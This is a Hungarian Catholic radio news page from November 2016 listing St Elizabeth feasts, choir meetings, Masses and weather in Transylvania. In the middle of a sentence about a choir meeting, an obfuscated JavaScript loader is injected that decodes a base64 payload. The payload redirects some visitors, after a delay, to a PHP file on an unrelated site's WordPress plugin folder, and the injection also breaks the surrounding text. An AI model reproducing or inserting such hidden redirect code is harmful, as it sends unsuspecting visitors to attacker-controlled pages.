2016. november 18. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap 
A Gyulafehérvári Főegyházmegyében holnap Nyújtódon tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Cursillos találkozó Kápolnásfaluban
Az őszi ULTREYÁRA várják a cursillos testvéreket holnap Kápolnásfaluban. A program reggel kilenc órakor szentmisével kezdődik.

Szent Erzsébet napi búcsúk, ünnepségek 
A kolozsvári Szent Kamill Otthonban (Erdő út, 11-es szám) november 18-20. között ötödik alkalommal tartják meg az Árpád-házi Szent Erzsébet napokat.
Székelylengyelfalván a templom védőszentjének, Árpád-házi Szent Erzsébetnek az ünnepén holnap délelőtt tizenegy órakor kezdődik a búcsús szentmise. A szentbeszédet Jakab Lajos vágási plébános tartja.
Marosvásárhelyen, a meggyesfalvi templom búcsús szentmiséje holnap délután öt órakor kezdődik.
A Székelyudvarhely-szombatfalvi Szent György templomban holnap délután öt órától tartják Szent Erzsébet napját. Az ünnepségre a gyermekek köszöntővel készülnek, megáldják a családok kenyerét, kalácsot szentelnek a betegek és idősek részére, valamint rózsát, hogy a férjek, édesapák, udvarló ifjak felköszönthessék a hölgyeket.
Szintén Székelyudvarhelyen, a Kis Szent Teréz templomban holnap az este fél hét órakor kezdődő szentmise keretében kenyér- és rózsaszentelés lesz.
Székelykeresztúr filiájában, Nagygalambfalván a kápolna búcsúját november 20-án, vasárnap délután három órától tartják. Ünnepi szónok Bajkó Norbert, a székelyudvarhelyi Szent Miklós plébánia segédlelkésze lesz.
Nagyváradon, a Szent Erzsébet otthon kápolnájának búcsúját holnap délelőtt tizenegy órától tartják. Az ünnepi szentmisét, melynek főcelebránsa és szónoka Vakon Zsolt püspöki titkár lesz, rádiónk élő adásban közvetíti.
Ugyancsak Nagyváradon, a Posticum Szent Erzsébet kápolnájának búcsúünnepe déli tizenkét órától kezdődik a Szent László plébánia szervezésében. A szentmise főcelebránsa és szónoka Simon Imre segesvári lelkész lesz. 
A temesvár-szabadfalui római katolikus plébániához tartozó paráci közösség is holnap, Szent Erzsébet napján ünnepli a templombúcsút. A szentmisét déli egy órai kezdettel Wonerth László kanonok, temesvár-szabadfalui plébános mutatja be.
A mezőpetri Árpád-házi Szent Erzsébet templom búcsúját holnap délelőtt tizenegy órától ünneplik. A szentmisében Néma Sándor kálmándi plébános mond majd szentbeszédet.

Kórustalálkozó Nagyváradon
Az egyházzenei élet fellendítése céljából szervezi meg a Nagyváradi Katolikus Püspökség az idén is az Egyházmegyei Kórustalálkozót. Az esemény helyszíne a nagyváradi székesegyház, ahol holnap délelőtt tíz órakor kezdődik a kórusok fellépése. Az idei találkozóra is olyan egyházi kórusok érkeznek, akik állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó jelleggel, heti rendszerességgel ünnepi liturgikus szolgálatot látnak el az egyházmegye templomaiban.

25 éves a Cum Jubilo kamarakórus
Holnap délben tizenkét órától, a szászrégeni „Cum Jubilo” római katolikus kamarakórus fennállásának 25. évfordulója alkalmából ünnepi szentmisével ad hálát a mindenható Atyának a kapott kegyelmekért! Várják a híveket a közös ünneplésre!

Adventi koszorúkötés „az ima közös nyelvén”
„A bizalom zarándoklata” mottóval adventi útra indulnak a reformáció 500. jubileumának küszöbén Csíkszentdomokoson. A Szent Margit házban adventi koszorúkötéssel egybekötött ökumenikus imaest lesz holnap délután hat órától, a Pro Educatione felnőttképzési szervezet rendezésében. Jelentkezni Darvas Piroska segítőnővérnél lehet a 0743-753494-es telefonszámon.

Mária köszöntő Kovásznán
Kovásznán minden hónap harmadik szombatján Mária áhítatot tartanak szentmisével, rózsafüzérrel és gyertyás körmenettel. Hívják és várják a háromszékieket holnap délután öt órakor a helyi plébániatemplomba.

Népemért vállalom Kézdiszentléleken
A marosvásárhelyi Mustármag Énekegyüttes holnap este hét órától a kézdiszentléleki Művelődési Házban bemutatja a Népemért vállalom című zeneművet. Várnak minden érdeklődőt!

Szentmise a Vártemplomban
November 20-án, a hónap harmadik vasárnapján délután négy órakor a nagyváradi székeskáptalan tagjai, a jelenlevő papokkal és hívekkel közösen, esti dicsérettel egybekötött szentmisét végeznek a nagyváradi Vártemplomban. A szentmisét bemutatja és szentbeszédet tart Rajna József fugyivásárhelyi plébános-kanonok.

Időjárás: Holnap a nyugati, délnyugati tájakon lehet szárazabb, naposabb idő, másutt erősen felhős, ködös marad az ég. A hajnal enyhébbnek igérkezik s napközben is 8-16 fokot mérhetünk.  

MRE - Hírszolgálat, 2016. november 18.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében ma Kézdimartonoson tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Örmény est Székelyudvarhelyen
Idén ünnepli a Székelyudvarhelyi Magyar Örmény Kulturális Egyesület megalakulásának ötödik évfordulóját. A megemlékezés ma délután öt órakor kezdődik a Ferences templomban, magyar-örmény katolikus liturgia keretében, amelyet Gál Hunor gyergyószentmiklósi örmény-katolikus plébános fog celebrálni, Sáska Magyari Zsolt diakónussal. Az ünnepi szentbeszédet Kovács Csaba Antal ferences atya tartja. A ünneplés a Polgármesteri Hivatal Szent István termében folytatódik, ahol történelmi-kulturális előadások lesznek. Várnak minden örmény származású és szimpatizáns érdeklődőt.

Sokarcú irgalmasság - Könyvbemutató Szászrégenben
A szászrégeni városi könyvtárban ma este fél hét órakor Bereczki Silvia segítőnővér, szerkesztő bemutatja a szentévre megjelent, Sokarcú irgalmasság - Vallomások, interjúk, tanulmányok című könyvet, a Keresztény Szó könyvek sorozat 5. kötetét. Közreműkődnek Bara László marosvásárhelyi plébános, Csog Ildikó pszichológus, Csog Árpád kémikus és Ludescher László Caritas ágazati igazgató. A házigazda Kiss-Miki Melinda. Várnak minden érdeklődőt.

Szent Erzsébet napi búcsúk, ünnepségek
A kolozsvári Szent Kamill Otthonban (Erdő út, 11-es szám) 2016. november 18-20. között ötödik alkalommal tartják meg az Árpád-házi Szent Erzsébet napokat.
Székelylengyelfalván a templom védőszentjének, Árpád-házi Szent Erzsébetnek az ünnepén szombaton délelőtt tizenegy órakor kezdődik a búcsús szentmise. A szentbeszédet Jakab Lajos vágási plébános tartja.
Marosvásárhelyen, a meggyesfalvi templom búcsús szentmiséje szombaton délután öt órakor kezdődik.
A Székelyudvarhely-szombatfalvi Szent György templomban november 19-én, szombaton délután öt órától ünneplik Szent Erzsébet napját. Az ünnepségre a gyermekek köszöntővel készülnek, megáldják a családok kenyerét, kalácsot szentelnek a betegek és idősek részére, valamint rózsát, hogy a férjek, édesapák, udvarló ifjak felköszönthessék a hölgyeket.
A székelyudvarhelyi Kis Szent Teréz templomban szombaton az este fél hét órakor kezdődő szentmise keretében kenyér- és rózsaszentelés lesz.
Székelykeresztúr filiájában, Nagygalambfalván a kápolna búcsúját november 20-án, vasárnap délután három órától tartják. Ünnepi szónoka Bajkó Norbert, a székelyudvarhelyi Szent Miklós plébánia segédlelkésze lesz.

Mária köszöntő Kovásznán
Kovásznán minden hónap harmadik szombatján Mária áhítatot tartanak szentmisével, rózsafüzérrel és gyertyás körmenettel. Hívják és várják a háromszékieket november 19-én, délután öt órakor a helyi plébániatemplomba.

Népemért vállalom Kézdiszentléleken
A marosvásárhelyi Mustármag Énekegyüttes 2016. november 19-én, szombaton este hét órától  a kézdiszentléleki Művelődési Házban bemutatja a Népemért vállalom című zeneművet. Várnak minden érdeklődőt!

Szentkapuk bezárása a Gyulafehérvári Főegyházmegyében  
Ferenc pápa, 2015. december 8-án – Szeplőtelen Fogantatás ünnepén – hirdette meg az Irgalmasság Rendkívüli Jubileumi Szentévét. A jubileumi búcsú elnyerésére a Főegyházmegyében három helyen nyitották meg az Irgalmasság Kapuját, hogy a hívek élni tudjanak e kegyelmi lehetőséggel. A Jubileumi Év 2016. november 20- án, Krisztus Király ünnepén zárul.
A gyulafehérvári székesegyház jubileumi kapuját Krisztus Király vasárnapján, a délelőtt kilenc órától kezdődő szentmise keretében, Jakubinyi György érsek zárja be.
A csíksomlyói kegytemplom jubileumi kapuját dr. Orbán Szabolcs, a Szent István királyról nevezett Erdélyi Ferences Rendtartomány elöljárója zárja be a délelőtt fél tizenegy órakor kezdődő szentmisén.
A kolozsvári Szent Mihály-plébániatemplom jubileumi kapuját ugyanezen a napon Tamás József püspök zárja be az este hat órakor kezdődő szentmise bemutatásával együtt.

Szent Cecília koncertek Kolozsváron
Az egyházzene és zenészek védőszentjének, Szent Cecília tiszteletére szervezett koncertsorozat XII. évadját tartják Kolozsváron november hónap hétfő estéin. A Szent Mihály-plébániatemplomban kiváló orgonaművészek tartanak hangversenyt, változatos műsorral, amely felölti az orgonamuzsika repertoár több mint öt évszázadát. A koncertsorozat november 21-én, hétfőn este hét órától Józsa Domokos nagyváradi orgonista előadásával folytatódik. Gottfried Walter, Johann Sebastian Bach, Wolfgang Amadeus Mozart és Marcel Dupré alkotásai csendülnek majd fel. A belépés ingyenes. Szíves adományaikat az orgona-együttes karbantartására fordítják.
 
Filmes lelkigyakorlat Csíkszentdomokoson
December 1-4. között Csíkszentdomokoson a Szent Margit Lelkigyakorlatos Házban Bereczki Silvia és Kerekes Izabella segítőnővérek vezetésével filmes lelkigyakorlat lesz, teljes csenddel és személyes kísérettel. Jelentkezni november 24-ig lehet a bereczkis2002@yahoo.com e-mail címen.

Időjárás: Ma már több napsütés, napközben száraz idő ígérkezik. Az enyhébb légtömegeknek köszönhetően a hajnali -1, +5 fok közötti értékek emelkednek, és  délután már 6-13 fok várható, nyugaton lesz melegebb, itt 10-15 fok körüli értékeket mérhetünk.

MRE - Hírszolgálat, 2016. november 18.

About the author

maradmin

Leave a Comment